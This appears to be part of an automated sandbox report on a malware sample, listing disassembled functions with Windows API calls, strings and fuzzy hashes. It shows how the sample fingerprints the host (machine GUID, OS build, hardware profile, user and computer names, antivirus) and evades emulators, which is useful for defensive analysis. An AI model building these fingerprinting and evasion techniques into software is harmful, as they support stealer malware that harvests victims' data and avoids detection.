Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 3722407311-2697854757
Opcode ID: 330e755a5acceb3ed6e28b61c0f423ca30b30309cc5dbf3a7a4b4b61e9ce12ac
Instruction ID: 944d77d85ce75c369d6a79d8860be8d390eb218c617d15e8ecb1ff3ea3b10990
Opcode Fuzzy Hash: 330e755a5acceb3ed6e28b61c0f423ca30b30309cc5dbf3a7a4b4b61e9ce12ac
Instruction Fuzzy Hash: 30B14932D00509AFDF20FFA8E947BCE77B5BF40314F564150F958AB252DA30AE199B92

Function 000810F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,.192827.1814076.1361492.23132.3200675.2552048.4491519.0238847.1290844.0536269.4231419.0299841.65291-.2698553 2.6225356-1.4375148 8.986738-2.0315537 11.9240228-.2513602 1.2428753-.7499132 1.5088847-1.2290685 1.5496672-1.0413153.0886298-1.8284257-.4857912-2.8369,00003000,00000004), ref: 000810AA
_memset.LIBCMT ref: 000810D0
VirtualFree.KERNEL32(00000000,.192827.1814076.1361492.23132.3200675.2552048.4491519.0238847.1290844.0536269.4231419.0299841.65291-.2698553 2.6225356-1.4375148 8.986738-2.0315537 11.9240228-.2513602 1.2428753-.7499132 1.5088847-1.2290685 1.5496672-1.0413153.0886298-1.8284257-.4857912-2.8369,00008000), ref: 000810E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,000984CC), ref: 00081100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00081107
ExitProcess.KERNEL32 ref: 00081112

Strings

.192827.1814076.1361492.23132.3200675.2552048.4491519.0238847.1290844.0536269.4231419.0299841.65291-.2698553 2.6225356-1.4375148 8.986738-2.0315537 11.9240228-.2513602 1.2428753-.7499132 1.5088847-1.2290685 1.5496672-1.0413153.0886298-1.8284257-.4857912-2.8369, xrefs: 000810A2, 000810A7, 000810E4

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID: .192827.1814076.1361492.23132.3200675.2552048.4491519.0238847.1290844.0536269.4231419.0299841.65291-.2698553 2.6225356-1.4375148 8.986738-2.0315537 11.9240228-.2513602 1.2428753-.7499132 1.5088847-1.2290685 1.5496672-1.0413153.0886298-1.8284257-.4857912-2.8369
API String ID: 1859398019-2322752083
Opcode ID: aca955f9da21bc63cb134809e02533f6ee51ca08615385fdc08eec9b06864f7a
Instruction ID: b1f2a1e8fa3bdbd30db306685554023c86bb7f0d8c1552a8354d699279e392d1
Opcode Fuzzy Hash: aca955f9da21bc63cb134809e02533f6ee51ca08615385fdc08eec9b06864f7a
Instruction Fuzzy Hash: 1BF0C87238131077F26032752C5EFEB6A5CAF41F61F204010F308EB2C1D69998059B74

Function 000915D4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00091607
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00091626
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0009164B
RegCloseKey.ADVAPI32(?,?,?,?), ref: 00091657
CharToOemA.USER32(?,?), ref: 0009166B

Strings

MachineGuid, xrefs: 00091640
SOFTWARE\Microsoft\Cryptography, xrefs: 0009161C

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2235053359-1211650757
Opcode ID: a7e3f7d2302aad444fd25daaa351007bae66f8b27fc006edabca38f2ef99d4da
Instruction ID: 06cb3d758ffd4ce14603df5cecf1a15372e2ea9f4a07111a0f6d7a854157ad7e
Opcode Fuzzy Hash: a7e3f7d2302aad444fd25daaa351007bae66f8b27fc006edabca38f2ef99d4da
Instruction Fuzzy Hash: 02111EB594121DAFEB10EB90EC89FEAB7BCEB04304F4001E5B659E6052D674AE889F10

Function 00090B30 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090B44
HeapAlloc.KERNEL32(00000000,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090B4B
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,000B6888,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090B79
RegQueryValueExA.KERNEL32(000B6888,00000000,00000000,00000000,000000FF,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090B95
RegCloseKey.ADVAPI32(000B6888,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090B9E

Strings

Windows 11, xrefs: 00090B5C

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: d41b254887a025b68aa0dbf44cd38f885edee283b2ad8514bbf19f38ffe2e9b0
Instruction ID: cb73217979a6d931c7d9c2387716607a0aefe4abc39957dbcb89a6615bed7e22
Opcode Fuzzy Hash: d41b254887a025b68aa0dbf44cd38f885edee283b2ad8514bbf19f38ffe2e9b0
Instruction Fuzzy Hash: 64F04475A00204BFEF106B91FC4EFAE7B69EB44B49F150065F601A9191D7B19D40A720

Function 00090BA9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00090C1B,00090B58,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090BBD
HeapAlloc.KERNEL32(00000000,?,?,?,00090C1B,00090B58,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090BC4
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,000B6888,?,?,?,00090C1B,00090B58,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090BE2
RegQueryValueExA.KERNEL32(000B6888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00090C1B,00090B58,?,?,?,00093E95,Windows: ), ref: 00090BFD
RegCloseKey.ADVAPI32(000B6888,?,?,?,00090C1B,00090B58,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090C06

Strings

CurrentBuildNumber, xrefs: 00090BF5

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: fb12643e2ddf38fc83df5e666f882e422ab6961e099d615fae90cb419b643517
Instruction ID: 8971c55e9af09a1ecb4bad7950a25869d32ae80b3aec46e7330f29c26282eae7
Opcode Fuzzy Hash: fb12643e2ddf38fc83df5e666f882e422ab6961e099d615fae90cb419b643517
Instruction Fuzzy Hash: 11F09075A40204FBEF106B90FC0EFAE7B7CEB44B45F140055F601A9191EAB19D40EB20

Function 00087FAC Relevance: 9.1, APIs: 6, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
LocalFree.KERNEL32(0008ECBC,?,?,?,?,0008E756,?,?,?), ref: 0008802B
CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 7c829af986833a1223f99d02b1948c6a95ff0f5e84c882a3e993f63c10f5503a
Instruction ID: ef7a3ba21b4639bb3a8a236f40f2f30302c6c002df8b27a244a547c49045e2e4
Opcode Fuzzy Hash: 7c829af986833a1223f99d02b1948c6a95ff0f5e84c882a3e993f63c10f5503a
Instruction Fuzzy Hash: 5D114970901204EFDF61AFA4EC88AAE7BB8FB44781F604549F481E6250EB719A85DF11

Function 00091757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0009175E
CoCreateInstance.OLE32(000B31B0,00000000,00000001,000BAF60,?,00000018,00091901,?), ref: 00091781
SysAllocString.OLEAUT32(?), ref: 0009178E
_wtoi64.MSVCRT ref: 000917C1
SysFreeString.OLEAUT32(?), ref: 000917DA
SysFreeString.OLEAUT32(00000000), ref: 000917E1

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: 60d928a025cc4913a315018d2f487f00d379e7f192d6add3fd6dab0bcd9ebf8f
Instruction ID: 0f33783c9be58c5d2c1b5d3e76b1d13ead32d27221b2573d4c5034429f4a1323
Opcode Fuzzy Hash: 60d928a025cc4913a315018d2f487f00d379e7f192d6add3fd6dab0bcd9ebf8f
Instruction Fuzzy Hash: A5114974A0424BDFCF009FE8CC889EEBBB6AF49300F104569F205E72A1CB354945DB50

Function 00091684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000916CE

Part of subcall function 000923D5: malloc.MSVCRT ref: 000923DA
Part of subcall function 000923D5: strncpy.MSVCRT ref: 000923EB

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 000916F6
lstrcatA.KERNEL32(?,000B6ECC,?,?,?,?,?), ref: 00091713
GetCurrentHwProfileA.ADVAPI32(?), ref: 0009169F

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Strings

Unknown, xrefs: 0009173C

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: Unknown
API String ID: 2781187439-1654365787
Opcode ID: 2a6d9cfb85ad2fc1b77a7d84ec99969de463a13d42c6839285cee2645c6287eb
Instruction ID: d5649d3a1814d2a26cd09de50c0fee88fdb20eeb41c490a87a394e5d659e1dda
Opcode Fuzzy Hash: 2a6d9cfb85ad2fc1b77a7d84ec99969de463a13d42c6839285cee2645c6287eb
Instruction Fuzzy Hash: 5A114F71A0011DABDF21FBA4DC86FDDB3B8BB18710F4004E2B685E7152EA74AE849F50

Function 00091119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,000B6910,Display Resolution: ,000B68F4,00000000,User Name: ,000B68E4,00000000,Computer Name: ,000B68D0,AV: ,000B68C4,Install Date: ), ref: 00091131
HeapAlloc.KERNEL32(00000000), ref: 00091138
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00091154
wsprintfA.USER32 ref: 0009117A

Strings

%d MB, xrefs: 00091174

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: 2d4f6e94e532a2b82f51f5e4c1b99874bb7397b119eec0f2a406502f3f1153ab
Instruction ID: 29f00ffedb859aaa376ea63d0ccfc45cf3c9efc3a20993ee3b7637ae054d02d3
